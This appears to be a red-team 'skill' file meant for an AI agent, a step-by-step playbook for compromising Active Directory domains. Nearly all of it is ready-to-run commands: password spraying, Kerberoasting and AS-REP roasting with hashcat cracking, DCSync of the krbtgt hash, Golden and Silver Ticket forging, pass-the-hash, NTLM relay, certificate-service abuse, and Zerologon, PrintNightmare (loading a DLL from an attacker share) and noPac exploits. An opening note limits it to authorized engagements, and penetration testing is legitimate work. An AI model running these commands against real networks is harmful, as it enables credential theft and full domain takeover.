Active Directory Attacks

Scope & Authorization

Use this skill only within authorized red-team or penetration-testing engagements targeting Active Directory domains; the documented sequences are not for defensive exercises, general Windows troubleshooting, or unauthorized testing. Follow engagement boundaries, avoid causing persistence beyond the scope, and do not execute these steps on non-AD systems.

Overview

Red-team operators combine reconnaissance, credential harvesting, Kerberos abuse, and lateral movement tooling to dominate Windows domains once they gain a foothold.

Inputs & Prerequisites

• Kali Linux, Windows attack platform, or similar toolset
• Domain user credentials with network access to a Domain Controller
• Tools such as Impacket, Mimikatz, BloodHound, Rubeus, CrackMapExec, PowerView, Responder
• Synchronize your system clock with the domain (±5 minutes) before launching Kerberos attacks

Outputs/Deliverables

• Domain enumeration data (users, groups, services, attack paths)
• Extracted credentials, hashes, and Kerberos tickets
• Elevated impersonation (Golden/Silver Ticket, delegated credentials)
• Persistent, documented access paths (local admin, service accounts, scheduled tasks)

Essential Tools

Core Workflow

This section tracks the high-level steps: clock sync, reconnaissance, credential attacks, Kerberos abuse, and relays.

Step 1: Kerberos Clock Sync

# Detect clock skew
nmap -sT 10.10.10.10 -p445 --script smb2-time

# Fix clock on Linux
sudo date -s "14 APR 2024 18:25:16"

# Fix clock on Windows
net time /domain /set

# Fake clock without changing system time
faketime -f '+8h' <command>

Step 2: AD Reconnaissance

# BloodHound / Neo4j
neo4j console
bloodhound --no-sandbox
.
# Collect with SharpHound
.\SharpHound.exe -c All
.\SharpHound.exe -c All --ldapusername user --ldappassword pass

# Python collector
bloodhound-python -u 'user' -p 'password' -d domain.local -ns 10.10.10.10 -c all

# PowerView
Get-NetDomain
Get-DomainSID
Get-NetDomainController
Get-NetUser
Get-NetUser -SamAccountName targetuser
Get-UserProperty -Properties pwdlastset
Get-NetGroupMember -GroupName "Domain Admins"
Get-DomainGroup -Identity "Domain Admins" | Select-Object -ExpandProperty Member
Find-LocalAdminAccess -Verbose
Invoke-UserHunter
Invoke-UserHunter -Stealth

Credential & Ticket Attacks

Focus on password spraying, Kerberoasting, AS-REP roasting, DCSync, and Kerberos ticket forging. Keep detailed commands, cracking steps, and ticket uses documented below.

Password Spraying

./kerbrute passwordspray -d domain.local --dc 10.10.10.10 users.txt Password123
crackmapexec smb 10.10.10.10 -u users.txt -p 'Password123' --continue-on-success

Kerberoasting

GetUserSPNs.py domain.local/user:password -dc-ip 10.10.10.10 -request -outputfile hashes.txt
.\Rubeus.exe kerberoast /outfile:hashes.txt
crackmapexec ldap 10.10.10.10 -u user -p password --kerberoast output.txt
hashcat -m 13100 hashes.txt rockyou.txt

AS-REP Roasting

GetNPUsers.py domain.local/ -usersfile users.txt -dc-ip 10.10.10.10 -format hashcat
.\Rubeus.exe asreproast /format:hashcat /outfile:hashes.txt
hashcat -m 18200 hashes.txt rockyou.txt

DCSync

secretsdump.py domain.local/admin:password@10.10.10.10 -just-dc-user krbtgt

lsadump::dcsync /domain:domain.local /user:krbtgt
lsadump::dcsync /domain:domain.local /user:Administrator

Kerberos Ticket Attacks

# Golden Ticket
kerberos::golden /user:Administrator /domain:domain.local /sid:S-1-5-21-xxx /krbtgt:HASH /id:500 /ptt

# Impacket ticketer
ticketer.py -nthash KRBTGT_HASH -domain-sid S-1-5-21-xxx -domain domain.local Administrator
export KRB5CCNAME=Administrator.ccache
psexec.py -k -no-pass domain.local/Administrator@dc.domain.local

# Silver Ticket
kerberos::golden /user:Administrator /domain:domain.local /sid:S-1-5-21-xxx /target:server.domain.local /service:cifs /rc4:SERVICE_HASH /ptt

# Pass-the-Hash
psexec.py domain.local/Administrator@10.10.10.10 -hashes :NTHASH
wmiexec.py domain.local/Administrator@10.10.10.10 -hashes :NTHASH
smbexec.py domain.local/Administrator@10.10.10.10 -hashes :NTHASH
crackmapexec smb 10.10.10.10 -u Administrator -H NTHASH -d domain.local
crackmapexec smb 10.10.10.10 -u Administrator -H NTHASH --local-auth

# OverPass-the-Hash
getTGT.py domain.local/user -hashes :NTHASH
export KRB5CCNAME=user.ccache

.\Rubeus.exe asktgt /user:user /rc4:NTHASH /ptt

NTLM Relay & Certificate Attacks

Relay victims, escalate privileges, and abuse certificate services with the following tooling.

responder -I eth0 -wrf
ntlmrelayx.py -tf targets.txt -smb2support
ntlmrelayx.py -t ldaps://dc.domain.local -wh attacker-wpad --delegate-access

crackmapexec smb 10.10.10.0/24 --gen-relay-list targets.txt

# AD CS ESC1
certipy find -u user@domain.local -p password -dc-ip 10.10.10.10
certipy req -u user@domain.local -p password -ca CA-NAME -target dc.domain.local -template VulnTemplate -upn administrator@domain.local
certipy auth -pfx administrator.pfx -dc-ip 10.10.10.10

# AD CS ESC8
ntlmrelayx.py -t http://ca.domain.local/certsrv/certfnsh.asp -smb2support --adcs --template DomainController

Advanced Topics (see references/advanced-attacks.md)

For delegation attacks, GPO abuse, RODC exploitation, SCCM/WSUS deployments, ADCS nuances, trust relationships, ADFS Golden SAML, credential sources, and Linux AD integration, load references/advanced-attacks.md.

Critical CVEs

crackmapexec smb 10.10.10.10 -u '' -p '' -M zerologon
python3 cve-2020-1472-exploit.py DC01 10.10.10.10
secretsdump.py -just-dc domain.local/DC01$@10.10.10.10 -no-pass
python3 restorepassword.py domain.local/DC01@DC01 -target-ip 10.10.10.10 -hexpass HEXPASSWORD

rpcdump.py @10.10.10.10 | grep 'MS-RPRN'
python3 CVE-2021-1675.py domain.local/user:pass@10.10.10.10 '\\attacker\share\evil.dll'

python3 sam_the_admin.py "domain.local/user:password" -dc-ip 10.10.10.10 -shell

Quick Reference

Constraints

• Must: Sync time with the DC before Kerberos attacks, use valid domain credentials, and document every compromised account.
• Must Not: Lock out accounts via aggressive spraying, alter production AD objects without approval, or leave forged tickets undocumented.
• Should: Run BloodHound for path discovery, verify SMB signing before relays, and confirm patch levels before exploiting CVEs.

Examples

Example 1: Domain Compromise via Kerberoasting

GetUserSPNs.py domain.local/lowpriv:password -dc-ip 10.10.10.10
GetUserSPNs.py domain.local/lowpriv:password -dc-ip 10.10.10.10 -request -outputfile tgs.txt
hashcat -m 13100 tgs.txt rockyou.txt
psexec.py domain.local/svc_admin:CrackedPassword@10.10.10.10

Example 2: NTLM Relay to LDAP

ntlmrelayx.py -t ldaps://dc.domain.local --delegate-access
python3 printerbug.py domain.local/user:pass@target 10.10.10.12
# Use created machine account for RBCD attack

Troubleshooting

Additional Resources

Load references/advanced-attacks.md when you need deeper guidance for delegation, GPO abuse, RODC/ADCS exploitation, trust relationships, ADFS Golden SAML, credential sources, or Linux AD integration.